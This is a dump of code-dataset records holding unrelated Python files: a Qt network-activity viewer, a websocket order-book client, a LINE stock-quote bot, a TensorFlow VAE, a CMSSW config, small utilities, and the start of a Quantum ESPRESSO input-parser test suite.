QApplication.clipboard().setText(curl_cmd)\n\n def set_reply(self, reply):\n if reply.error() == QNetworkReply.OperationCanceledError:\n self.status = CANCELED\n elif reply.error() != QNetworkReply.NoError:\n self.status = ERROR\n else:\n self.status = COMPLETE\n self.time = int((time.time() - self.time) * 1000)\n self.http_status = reply.attribute(QNetworkRequest.HttpStatusCodeAttribute)\n self.content_type = reply.rawHeader(b'Content-Type').data().decode('utf-8')\n ReplyItem(reply, self)\n\n def set_timed_out(self):\n self.status = TIMEOUT\n\n def set_progress(self, received, total):\n self.replies += 1\n self.progress = (received, total)\n\n def set_ssl_errors(self, errors):\n self.ssl_errors = errors\n SslErrorsItem(errors, self)\n\n def actions(self):\n return [self.open_url_action, self.copy_as_curl_action]\n\n def tooltip(self, column):\n bytes = 'unknown'\n if self.progress:\n rec, tot = self.progress\n if rec > 0 and rec < tot:\n bytes = '{}/{}'.format(rec, tot)\n elif rec > 0 and rec == tot:\n bytes = '{}'.format(tot)\n # ?? adding
instead of \\n after (very long) url seems to break url up\n # COMPLETE, Status: 200 - text/xml; charset=utf-8 - 2334 bytes - 657 milliseconds\n return \"{}
{} - Status: {} - {} - {} bytes - {} msec - {} replies\" \\\n .format(self.url.url(), self.status, self.http_status, self.content_type, bytes, self.time, self.replies)\n\n\nclass RequestItem(ActivityTreeItem):\n def __init__(self, request, parent=None):\n super().__init__(parent)\n\n self.url = request.request().url()\n self.operation = self.operation2string(request.operation())\n query = QUrlQuery(self.url)\n RequestDetailsItem('Operation', self.operation, self)\n RequestDetailsItem('Thread', request.originatingThreadId(), self)\n RequestDetailsItem('Initiator', request.initiatorClassName() if request.initiatorClassName() else 'unknown',\n self)\n if request.initiatorRequestId():\n RequestDetailsItem('ID', str(request.initiatorRequestId()), self)\n\n RequestDetailsItem('Cache (control)', self.cache_control_to_string(\n request.request().attribute(QNetworkRequest.CacheLoadControlAttribute)), self)\n RequestDetailsItem('Cache (save)', 'Can store result in cache' if request.request().attribute(\n QNetworkRequest.CacheSaveControlAttribute) else 'Result cannot be stored in cache', self)\n\n query_items = query.queryItems()\n if query_items:\n RequestQueryItems(query_items, self)\n RequestHeadersItem(request, self)\n if self.operation in ('POST', 'PUT'):\n PostContentItem(request, self)\n\n @staticmethod\n def cache_control_to_string(cache_control_attribute):\n if cache_control_attribute == QNetworkRequest.AlwaysNetwork:\n return 'Always load from network, do not check cache'\n elif cache_control_attribute == QNetworkRequest.PreferNetwork:\n return 'Load from the network if the cached entry is older than the network entry'\n elif cache_control_attribute == QNetworkRequest.PreferCache:\n return 'Load from cache if available, otherwise load from network'\n elif cache_control_attribute == QNetworkRequest.AlwaysCache:\n return 'Only load from cache, error if no cached entry available'\n return None\n\n def text(self, column):\n return 'Request' if column == 0 else ''\n\n\nclass RequestDetailsItem(ActivityTreeItem):\n def __init__(self, description, value, parent=None):\n super().__init__(parent)\n\n self.description = description\n self.value = value\n\n def text(self, column):\n if column == 0:\n #return self.description\n return '{:30}: {}'.format(self.description, self.value)\n else:\n return self.value\n\n\nclass RequestHeadersItem(ActivityTreeItem):\n def __init__(self, request, parent=None):\n super().__init__(parent)\n\n for header in request.request().rawHeaderList():\n RequestDetailsItem(header.data().decode('utf-8'),\n request.request().rawHeader(header).data().decode('utf-8'), self)\n\n def text(self, column):\n if column == 0:\n return 'Headers'\n else:\n return ''\n\n\nclass RequestQueryItems(ActivityTreeItem):\n def __init__(self, query_items, parent=None):\n super().__init__(parent)\n\n for item in query_items:\n RequestDetailsItem(item[0], item[1], self)\n\n def text(self, column):\n if column == 0:\n return 'Query'\n else:\n return ''\n\n\nclass PostContentItem(ActivityTreeItem):\n # request = QgsNetworkRequestParameters\n def __init__(self, request, parent=None):\n super().__init__(parent)\n\n # maybe should be &?\n # for p in request.content().data().decode('utf-8').split('&'):\n # PostDetailsItem(p, self)\n\n data = request.content().data().decode('utf-8')\n PostDetailsItem(data, self)\n\n def text(self, column):\n if column == 0:\n return 'Content'\n else:\n return ''\n\n\nclass PostDetailsItem(ActivityTreeItem):\n def __init__(self, part, parent=None):\n super().__init__(parent)\n\n # self.description, self.value = part.split('=')\n self.data = part\n\n def text(self, column):\n if column == 0:\n #return 'Data'\n return '{:30}: {}'.format('Data', self.data)\n else:\n return self.data\n\n\nclass ReplyItem(ActivityTreeItem):\n def __init__(self, reply, parent=None):\n super().__init__(parent)\n ReplyDetailsItem('Status', reply.attribute(QNetworkRequest.HttpStatusCodeAttribute), self)\n if reply.error() != QNetworkReply.NoError:\n ReplyDetailsItem('Error Code', reply.error(), self)\n ReplyDetailsItem('Error', reply.errorString(), self)\n\n RequestDetailsItem('Cache (result)', 'Used entry from cache' if reply.attribute(\n QNetworkRequest.SourceIsFromCacheAttribute) else 'Read from network', self)\n\n ReplyHeadersItem(reply, self)\n\n def text(self, column):\n return 'Reply' if column == 0 else ''\n\n\nclass ReplyHeadersItem(ActivityTreeItem):\n def __init__(self, reply, parent=None):\n super().__init__(parent)\n\n for header in reply.rawHeaderList():\n ReplyDetailsItem(header.data().decode('utf-8'),\n reply.rawHeader(header).data().decode('utf-8'), self)\n\n def text(self, column):\n if column == 0:\n return 'Headers'\n else:\n return ''\n\n\nclass ReplyDetailsItem(ActivityTreeItem):\n def __init__(self, description, value, parent=None):\n super().__init__(parent)\n\n self.description = description\n self.value = value\n\n def text(self, column):\n if column == 0:\n #return self.description\n return '{:30}: {}'.format(self.description, self.value)\n else:\n return self.value\n\n\nclass SslErrorsItem(ActivityTreeItem):\n def __init__(self, errors, parent=None):\n super().__init__(parent)\n for error in errors:\n ReplyDetailsItem('Error',\n error.errorString(), self)\n\n def text(self, column):\n if column == 0:\n return 'SSL errors'\n else:\n return ''\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":24639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"216542998","text":"import abc\nimport asyncio\nimport time\nimport json\nimport sys\nfrom socket import error as socket_error\nfrom pprint import pprint, pformat\n\nimport websockets\nfrom websockets import ConnectionClosed\n\nfrom defines import ASK, BID\nfrom orderbook import OrderBook\nfrom utils.logger import get_logger\n\nLOG = get_logger('WebSocketAPI', 'wss.log')\n\nwrite = sys.stdout.write\nflush = sys.stdout.flush\n\nclass WebSocketAPI(object):\n stores = {}\n \n def __init__(self, pair, url, payload):\n self.url = url\n self.payload = payload\n self.pair = pair\n self.l2_book = OrderBook(pair)\n \n def __repr__(self):\n return pformat(self.stores)\n \n @property\n def name(self):\n return self.__class__.__name__\n \n async def connect(self):\n async with websockets.connect(self.url) as websocket:\n await websocket.send(json.dumps(self.payload))\n \n while True:\n # 비동기가 아닌 경우 수신된 메시지가 없을 때 sleep을 해줘야 GIL이 해제되지만,\n # await 키워드를 사용하는 경우는 어떻게 되는 건지?\n message = await websocket.recv()\n await self.message_handler(message)\n await self.book_callback()\n \n async def book_callback(self):\n name = self.name\n book = self.l2_book\n self.stores.update({name: book})\n print(self)\n \n @abc.abstractmethod\n async def message_handler(self, message):\n '웹소켓 메시지 핸들러'\n","sub_path":"websocketapi.py","file_name":"websocketapi.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"638334803","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals\nfrom linebot.models import *\nfrom linebot.exceptions import (\n InvalidSignatureError\n)\nfrom linebot import (\n LineBotApi, WebhookParser\n)\nfrom flask import Flask, request, abort\nfrom imgurpython import ImgurClient\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nimport os\nimport random\nimport time\nfrom datetime import timedelta, datetime\nfrom pymongo import MongoClient\n\n# ref: http://twstock.readthedocs.io/zh_TW/latest/quickstart.html#id2\nimport twstock\n\nimport matplotlib\nmatplotlib.use('Agg') # ref: https://matplotlib.org/faq/howto_faq.html\n\n\napp = Flask(__name__)\n\n\nchannel_secret_8 = os.environ.get(\"CHANNEL_SECRET\")\nchannel_access_token_8 = os.environ.get(\"CHANNEL_ACCESS_TOKEN\")\n\nline_bot_api_8 = LineBotApi(channel_access_token_8) # 傳送\nparser_8 = WebhookParser(channel_secret_8) # 接收\n\n\n# ===================================================\n# stock bot\n# ===================================================\n@app.route(\"/callback_yangbot8\", methods=['POST'])\ndef callback_yangbot8():\n signature = request.headers['X-Line-Signature']\n\n # get request body as text\n body = request.get_data(as_text=True)\n app.logger.info(\"Request body: \" + body)\n\n # parse webhook body\n try:\n events = parser_8.parse(body, signature) \n except InvalidSignatureError:\n abort(400)\n\n for event in events:\n if not isinstance(event, MessageEvent): # 判斷是否為訊息事件\n continue\n if not isinstance(event.message, TextMessage): # 判斷是否為文字\n continue\n\n text = event.message.text\n #userId = event['source']['userId']\n if(text.lower() == 'me'):\n content = str(event.source.user_id)\n\n line_bot_api_8.reply_message(\n event.reply_token,\n TextSendMessage(text=content)\n )\n elif(text.lower() == 'profile'):\n profile = line_bot_api_8.get_profile(event.source.user_id)\n my_status_message = profile.status_message\n if not my_status_message:\n my_status_message = '-'\n line_bot_api_8.reply_message(\n event.reply_token, [\n TextSendMessage(\n text='Display name: ' + profile.display_name\n ),\n TextSendMessage(\n text='picture url: ' + profile.picture_url\n ),\n TextSendMessage(\n text='status_message: ' + my_status_message\n ),\n ]\n )\n\n elif(text.startswith('#')):\n text = text[1:]\n content = ''\n\n stock_rt = twstock.realtime.get(text)\n my_datetime = datetime.fromtimestamp(stock_rt['timestamp']+8*60*60)\n my_time = my_datetime.strftime('%H:%M:%S')\n\n content += '%s (%s) %s\\n' % (\n stock_rt['info']['name'],\n stock_rt['info']['code'],\n my_time)\n content += '現價: %s / 開盤: %s\\n' % (\n stock_rt['realtime']['latest_trade_price'],\n stock_rt['realtime']['open'])\n content += '最高: %s / 最低: %s\\n' % (\n stock_rt['realtime']['high'],\n stock_rt['realtime']['low'])\n content += '量: %s\\n' % (stock_rt['realtime']\n ['accumulate_trade_volume'])\n\n stock = twstock.Stock(text) # twstock.Stock('2330')\n content += '-----\\n'\n content += '最近五日價格: \\n'\n price5 = stock.price[-5:][::-1]\n date5 = stock.date[-5:][::-1]\n for i in range(len(price5)):\n #content += '[%s] %s\\n' %(date5[i].strftime(\"%Y-%m-%d %H:%M:%S\"), price5[i])\n content += '[%s] %s\\n' % (date5[i].strftime(\"%Y-%m-%d\"),\n price5[i])\n line_bot_api_8.reply_message(\n event.reply_token,\n TextSendMessage(text=content)\n )\n\n elif(text.startswith('/')):\n text = text[1:]\n fn = '%s.png' % (text)\n stock = twstock.Stock(text)\n my_data = {'close': stock.close,\n 'date': stock.date, 'open': stock.open}\n df1 = pd.DataFrame.from_dict(my_data)\n\n df1.plot(x='date', y='close')\n plt.title('[%s]' %(stock.sid))\n plt.savefig(fn)\n plt.close()\n\n # -- upload\n # imgur with account: your.mail@gmail.com\n client_id = os.environ.get(\"IMGUR_ID\")\n client_secret = os.environ.get(\"IMGUR_SECRET\")\n\n client = ImgurClient(client_id, client_secret)\n print(\"Uploading image... \")\n image = client.upload_from_path(fn, anon=True)\n print(\"Done\")\n\n url = image['link']\n image_message = ImageSendMessage(\n original_content_url=url,\n preview_image_url=url\n )\n\n line_bot_api_8.reply_message(\n event.reply_token,\n image_message\n )\n\n elif(text.startswith('$')):\n text = text[1:]\n print(text)\n stock = twstock.Stock(text)\n bfp = twstock.BestFourPoint(stock)\n\n print(bfp.best_four_point())\n content = \"建議做多,因為:\\n\" if bfp.best_four_point()[\n 0] else \"建議放空,因為:\\n\"\n content += bfp.best_four_point()[1]\n\n line_bot_api_8.reply_message(\n event.reply_token,\n TextSendMessage(text=content)\n )\n \n else:\n content = \"歡迎使用STOCK股票小精靈!( ^ω^)\\n基礎功能請輸入:\\n#股票代號 查詢即時股價。\\n/股票代號 觀看股票線圖。\\n$股票代號 觀看簡單分析。\"\n line_bot_api_8.reply_message(\n event.reply_token,\n TextSendMessage(text=content)\n )\n\n return 'OK'\n\n\n@app.route(\"/\", methods=['GET'])\ndef basic_url():\n return 'OK'\n\n\nif __name__ == \"__main__\":\n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"56269924","text":"# !usr/bin/env python\n# -*- coding:utf-8 -*-\n\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nfrom sklearn.model_selection import train_test_split\nfrom tensorflow.contrib.layers import batch_norm\nfrom tensorflow.contrib.layers import l2_regularizer\nfrom tensorflow.contrib.layers import l1_regularizer\n\n#os.environ['CUDA_VISIBLE_DEVICES']='1'\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"1\"\n\nclass LatentAttention():\n def __init__(self):\n #self.n_hidden = 500\n self.n_z = 62\n self.batchsize = 64\n self.inputDim=3686\n self.compressDims=[1024,512,self.n_z]\n self.decompressDims=[512,1024,3686]\n self.vaeActivation=tf.nn.relu\n self.epoches=501\n self.l1scale=0.1\n self.l2scale=0.1\n\n def load_data(self):\n f = open(\"/home/deermini/PycharmProjects/medical-analysis/GAN_for_medical_2/gene_data/index_label.txt\")\n index = []\n for li in f.readlines():\n index.append(int(li.split()[0]))\n f.close()\n\n data = np.load(\n \"/home/deermini/PycharmProjects/medical-analysis/GAN_for_medical_2/gene_data/data_to_gene/True_data.npy\")\n data_weights = data[:, 1961];data_x = data[:, :1960];data_y = data[:, 1962:]\n data_y = data_y[:, index]\n data = np.hstack((data_x, data_y))\n\n return data\n\n def print2file(self, buf, outFile):\n outfd = open(outFile, 'a')\n outfd.write(buf + '\\n')\n outfd.close()\n\n # encoder\n def recognition(self, x_input,reuse=False,is_training=True):\n with tf.variable_scope(\"recognition\",reuse=reuse,regularizer=l2_regularizer(self.l2scale)):\n tempVec = x_input\n tempDim = self.inputDim\n i = 0\n for compressDim in self.compressDims[:-1]:\n W = tf.get_variable('vaee_W_' + str(i), shape=[tempDim, compressDim],\n initializer=tf.contrib.layers.xavier_initializer())\n b = tf.get_variable('vaee_b_' + str(i), shape=[compressDim])\n tempVec = self.vaeActivation(tf.add(tf.matmul(tempVec, W),b))\n tempDim = compressDim\n i += 1\n W = tf.get_variable('vaee_W_' + str(i), shape=[tempDim, self.compressDims[-1]],\n initializer=tf.contrib.layers.xavier_initializer())\n b = tf.get_variable('vaee_b_' + str(i), shape=[self.compressDims[-1]])\n mean=tf.add(tf.matmul(tempVec, W),b)\n W = tf.get_variable('vaee_W_' + str(i+1), shape=[tempDim, self.compressDims[-1]],\n initializer=tf.contrib.layers.xavier_initializer())\n b = tf.get_variable('vaee_b_' + str(i+1), shape=[self.compressDims[-1]])\n stddev= tf.add(tf.matmul(tempVec, W), b)\n stddev = 1e-6 + tf.nn.softplus(stddev)\n return mean,stddev\n\n # decoder\n def generation(self, z,reuse=False,is_training=True):\n with tf.variable_scope(\"generation\",reuse=reuse,regularizer=l2_regularizer(self.l2scale)):\n i = 0;tempDim=self.n_z\n tempVec=z\n for decompressDim in self.decompressDims[:-1]:\n W = tf.get_variable('vaed_W_' + str(i), shape=[tempDim, decompressDim],\n initializer=tf.contrib.layers.xavier_initializer())\n b = tf.get_variable('vaed_b_' + str(i), shape=[decompressDim])\n tempVec=tf.add(tf.matmul(tempVec,W),b)\n tempVec = self.vaeActivation(tempVec)\n tempDim = decompressDim\n i += 1\n W = tf.get_variable('vaed_W_' + str(i), shape=[tempDim, self.decompressDims[-1]],\n initializer=tf.contrib.layers.xavier_initializer())\n b = tf.get_variable('vaed_b_' + str(i), shape=[self.decompressDims[-1]])\n x_reconst = tf.nn.sigmoid(tf.add(tf.matmul(tempVec, W),b))\n return x_reconst\n\n\n def train(self,\n path='/home/deermini/PycharmProjects/medical-analysis/GAN for medical/input_data.npy',\n saveMaxKeep=0\n ):\n with tf.name_scope(\"input_data\"):\n self.inputs = tf.placeholder(tf.float32, [None, self.inputDim])\n\n z_mean, z_stddev = self.recognition(self.inputs)\n samples = tf.random_normal([self.batchsize, self.n_z], 0, 1, dtype=tf.float32)\n\n \"\"\"版本1\"\"\"\n guessed_z = z_mean + (z_stddev * samples)\n generated_outputs = self.generation(guessed_z)\n\n with tf.name_scope(\"generation_loss\"):\n self.generation_loss = -tf.reduce_mean(tf.reduce_sum(\n self.inputs * tf.log(tf.clip_by_value(generated_outputs, 1e-8, 1 - 1e-8)) + (1 - self.inputs) * tf.log(\n 1 - tf.clip_by_value(generated_outputs, 1e-8, 1 - 1e-8)),1))\n tf.summary.scalar(\"gene_loss\",self.generation_loss)\n\n with tf.name_scope(\"KL_Loss\"):\n self.latent_loss = tf.reduce_mean(0.5 * tf.reduce_sum(\n tf.square(z_mean) + tf.square(z_stddev) - tf.log(1e-8+tf.square(z_stddev))-1,1))\n tf.summary.scalar(\"klloss\",self.latent_loss)\n\n\n \"\"\"版本2\"\"\"\n # guessed_z = z_mean + tf.exp(z_stddev/2) * samples\n # generated_outputs = self.generation(guessed_z)\n # self.generated_outputs = tf.clip_by_value(generated_outputs, 1e-8, 1 - 1e-8)\n #\n # self.generation_loss = -tf.reduce_sum(\n # self.inputs * tf.log(self.generated_outputs) + (1 - self.inputs) * tf.log(\n # 1 - self.generated_outputs), 1)\n #\n # self.latent_loss = 0.5 * tf.reduce_sum(\n # tf.square(z_mean) + tf.exp(z_stddev) - z_stddev - 1, 1)\n\n with tf.name_scope(\"cost\"):\n self.lamda=10\n self.cost =self.generation_loss + self.lamda*self.latent_loss\n tf.summary.scalar(\"cost\", self.cost)\n\n regular_loss=tf.reduce_mean(tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES))\n t_vars = tf.trainable_variables()\n self.optimizer = tf.train.AdamOptimizer(learning_rate=0.0001).minimize(self.cost+regular_loss,var_list=t_vars)\n\n merged = tf.summary.merge_all()\n #writer = tf.summary.FileWriter(\"log/\",tf.get_default_graph())\n saver = tf.train.Saver(max_to_keep=saveMaxKeep)\n if not os.path.exists(\"result\"):\n os.makedirs(\"result\")\n logFile = \"result/result.txt\"\n data = self.load_data()\n nbatches = int(data.shape[0] / self.batchsize)\n\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n with tf.Session(config=config) as sess:\n writer = tf.summary.FileWriter(\"log/\", sess.graph)\n sess.run(tf.initialize_all_variables())\n idx = np.arange(data.shape[0])\n for epoch in range(self.epoches):\n np.random.shuffle(idx)\n for i in range(nbatches):\n start=i*self.batchsize;end=(i+1)*self.batchsize\n batchx=data[idx[start:end]]\n mean, stddev=sess.run([z_mean, z_stddev],feed_dict={self.inputs:batchx})\n _,geneloss,latentloss,regul_loss,loss = sess.run([self.optimizer,self.generation_loss,self.latent_loss,regular_loss, self.cost], feed_dict={self.inputs: batchx})\n\n if i%50==0:\n rs = sess.run(merged, feed_dict={self.inputs:batchx})\n writer.add_summary(rs, epoch*nbatches+i)\n #print(\"geneloss\", geneloss)\n buf='Epoch:%d,step:%d,geneloss:%f,latentloss:%f,regul_loss:%f,loss:%f'%(epoch,i,geneloss,latentloss,regul_loss,loss)\n #print('mean, stddev:',mean,stddev)\n print(buf)\n self.print2file(buf, logFile)\n if epoch%20==0:\n savePath=saver.save(sess,'checkpoint_ave/save_net.ckpt',global_step=epoch)\n print(savePath)\n\n def geneData(self,\n dataPath='data',\n nSamples=10000,\n modelFile='model',\n batchSize=1000,\n outFile=None):\n self.z=tf.placeholder(\"float\",[None,self.n_z])\n gene_data=self.generation(self.z)\n saver=tf.train.Saver()\n outputVec = []\n with tf.Session() as sess:\n saver.restore(sess, modelFile)\n print('generating')\n nBatches = int(np.ceil(float(nSamples) / float(batchSize)))\n for i in range(nBatches):\n randomX = np.random.normal(size=[batchSize,self.n_z])\n output = sess.run(gene_data, feed_dict={self.z: randomX})\n outputVec.extend(output)\n\n outputMat = np.array(outputVec)\n np.save(outFile, outputMat)\n self.check(outFile)\n\n def check(self,outFile):\n from scipy.sparse import csc_matrix\n \"\"\" translate float into int\"\"\"\n data = np.load(outFile)\n print(data.shape)\n data_train = []\n for li in data:\n raw_data = []\n for i, lj in enumerate(li):\n if lj >= 0.5:\n raw_data.append(1)\n else:\n raw_data.append(0)\n data_train.append(raw_data)\n print(np.array(data_train))\n outputMat = np.array(data_train)\n #index主要是为了去除不符合要求的数据,比如全零行。\n index = list(set(np.where(outputMat[:,:1960])[0]))\n np.save(outFile, outputMat[index])\n\n \"\"\"检查一下生成的数据情况\"\"\"\n real_data = np.load(\"/home/deermini/PycharmProjects/medical-analysis/GAN for medical/input_data.npy\")\n gene_data = np.load(outFile)\n print(real_data.shape)\n print(gene_data.shape)\n #print(csc_matrix(gene_data))\n\n for li in gene_data[:30]:\n print(\"==============================\")\n print(csc_matrix(li[:1960]))\n print()\n print(csc_matrix(li[1960:]))\n\n print(\"shape:\", gene_data.shape)\n\nmodel = LatentAttention()\nmodel.train()\noutpath=\"data/gene_vaedata_toint.npy\"\nmodel.geneData(nSamples=18000,\n modelFile=\"checkpoint_ave/save_net.ckpt-500\",\n outFile=outpath)\n","sub_path":"VAE/vae.py","file_name":"vae.py","file_ext":"py","file_size_in_byte":10327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"403774649","text":"import FWCore.ParameterSet.Config as cms\n#from mAOD_GravFiles import *\n#from mAOD_RadFiles import *\nfrom microAOD_RadFiles import *\n\nprocess = cms.Process(\"bbggtruthdiff\")\n\nprocess.load(\"FWCore.MessageService.MessageLogger_cfi\")\n\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )\nprocess.MessageLogger.cerr.FwkReport.reportEvery = cms.untracked.int32( 2000 )\n\nprocess.source = cms.Source(\"PoolSource\",\n # replace 'myfile.root' with the source file you want to use\n fileNames = cms.untracked.vstring(\n#'file:/afs/cern.ch/work/r/rateixei/work/DiHiggs/FLASHggPreSel/CMSSW_7_4_0_pre9/src/flashgg/MicroAOD/test/hhbbgg_hggVtx.root' \n#'/store/user/rateixei/flashgg/RunIISpring15DR74/RunIISpring15MicroAODV1/GluGluToBulkGravitonToHHTo2B2G_M-260_narrow_13TeV-madgraph/RunIISpring15DR74-RunIISpring15MicroAODV1-v0-RunIISpring15DR74-Asympt25ns_MCRUN2_74_V9-v1/150615_144924/0000/microAOD_1.root'\n RadFiles['320']\n#\t\tGravFiles['270']\n )\n)\n\nprocess.load(\"flashgg.bbggTools.bbggTruthDiff_cfi\")\nprocess.bbggtruthdiff.OutFileName = cms.untracked.string('myPlots.root')\n\n\nprocess.p = cms.Path(process.bbggtruthdiff)\n","sub_path":"python/bbggTruthDiff_cfg.py","file_name":"bbggTruthDiff_cfg.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"294747708","text":"\ndef check(g):\n stack = []\n stack2 = []\n gs = list(map(str, g))\n for i in gs:\n if i == '(':\n stack.append(i)\n else:\n stack2.append(i)\n\n if len(stack) == len(stack2):\n return 'ok'\n else:\n return 'ㄴㄴ'\n\n\n\n\n\nprint(check('()()((()))'))","sub_path":"Algorithm/190820/연습문제2.py","file_name":"연습문제2.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"359565729","text":"def merge_dict(d1, d2):\n \"\"\"\n Merges two dictionaries into one new dict using copy()\n\n :param d1: Dict()\n :param d2: Dict()\n :return: Dict()\n \"\"\"\n merged = d1.copy()\n merged.update(d2)\n return merged\n\n\nclass AutoDiscover():\n\n def __getitem__(self, key):\n if not hasattr(self, 'channels'):\n self.channels = self.discover_channels()\n return self.channels[key]\n\n @staticmethod\n def discover_channels():\n from django.conf import settings\n from django.utils.importlib import import_module\n\n channels = {}\n\n for app in settings.INSTALLED_APPS:\n try:\n lookup = import_module('%s.lookup' % app)\n\n if hasattr(lookup, \"AJAX_LOOKUP_CHANNELS\"):\n channels = merge_dict(channels, lookup.AJAX_LOOKUP_CHANNELS)\n except:\n pass\n\n return channels","sub_path":"ajax_selects_autodiscover/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"614184435","text":"#!/usr/bin/env python\nfrom __future__ import print_function\nfrom builtins import (bytes, dict, int, list, object, range, str, ascii, chr,\n hex, input, next, oct, open, pow, round, super, filter,\n map, zip)\n\nimport io\nimport os\nimport unittest\nimport json\n\nfrom qe_tools import PwInputFile, CpInputFile\nfrom qe_tools.utils.exceptions import InputValidationError\n\n# Folder with input file examples\ndata_folder = os.path.join(os.path.split(os.path.abspath(__file__))[0], 'data')\n# Folder with parsing comparison\nreference_folder = os.path.join(data_folder, 'ref')\n\n\nclass CustomTestCase(unittest.TestCase):\n \"\"\"\n Extension of the unittest TestCase to support also deep almost-equal\n comparisons of dicts\n )\n \"\"\"\n\n def assertNestedAlmostEqual(self, expected, actual, *args, **kwargs):\n \"\"\"\n Check that dict have almost equal content, for float content.\n Works recursively for dicts, tuples, lists, ... Use\n :py:meth:`unittest.TestCase.assertEqual` except for numbers, where\n :py:meth:`unittest.TestCase.assertAlmostEqual` is used.\n Additional parameters are passed only to AlmostEqual\n \"\"\"\n import numpy\n is_root = not '__trace' in kwargs\n trace = kwargs.pop('__trace', 'ROOT')\n try:\n if isinstance(expected, (int, float, complex)):\n self.assertAlmostEqual(expected, actual, *args, **kwargs)\n elif isinstance(expected, (list, tuple, numpy.ndarray)):\n self.assertEqual(len(expected), len(actual))\n for index in range(len(expected)):\n v1, v2 = expected[index], actual[index]\n self.assertNestedAlmostEqual(v1,\n v2,\n __trace=repr(index),\n *args,\n **kwargs)\n elif isinstance(expected, dict):\n self.assertEqual(set(expected), set(actual))\n for key in expected:\n self.assertNestedAlmostEqual(expected[key],\n actual[key],\n __trace=repr(key),\n *args,\n **kwargs)\n else:\n self.assertEqual(expected, actual)\n except AssertionError as exc:\n exc.__dict__.setdefault('traces', []).append(trace)\n if is_root:\n trace = ' -> '.join(reversed(exc.traces))\n exc = AssertionError(\"%s\\nTRACE: %s\" % (str(exc), trace))\n raise exc\n\n def assertNestedAlmostEqualOnlyKeysInFirst(self, expected, actual, *args,\n **kwargs):\n \"\"\"\n Check that dict have almost equal content, for float content.\n\n Check only keys in first dictionary (i.e. if it contains less keys,\n only those are checked).\n Works recursively for dicts, tuples, lists, ... Use\n :py:meth:`unittest.TestCase.assertEqual` except for numbers, where\n :py:meth:`unittest.TestCase.assertAlmostEqual` is used.\n Additional parameters are passed only to AlmostEqual\n \"\"\"\n import numpy\n is_root = not '__trace' in kwargs\n trace = kwargs.pop('__trace', 'ROOT')\n try:\n if isinstance(expected, (int, float, complex)):\n self.assertAlmostEqual(expected, actual, *args, **kwargs)\n elif isinstance(expected, (list, tuple, numpy.ndarray)):\n self.assertEqual(len(expected), len(actual))\n for index in range(len(expected)):\n v1, v2 = expected[index], actual[index]\n self.assertNestedAlmostEqual(v1,\n v2,\n __trace=repr(index),\n *args,\n **kwargs)\n elif isinstance(expected, dict):\n self.assertEqual(set(expected),\n set(actual).intersection(set(expected)))\n for key in expected:\n self.assertNestedAlmostEqualOnlyKeysInFirst(\n expected[key],\n actual[key],\n __trace=repr(key),\n *args,\n **kwargs)\n else:\n self.assertEqual(expected, actual)\n except AssertionError as exc:\n exc.__dict__.setdefault('traces', []).append(trace)\n if is_root:\n trace = ' -> '.join(reversed(exc.traces))\n exc = AssertionError(\"%s\\nTRACE: %s\" % (str(exc), trace))\n raise exc\n\n\nclass PwTest(CustomTestCase):\n def singletest(self, label, parser='pw'):\n \"\"\"\n Run a single test.\n\n :param label: used to generate the filename (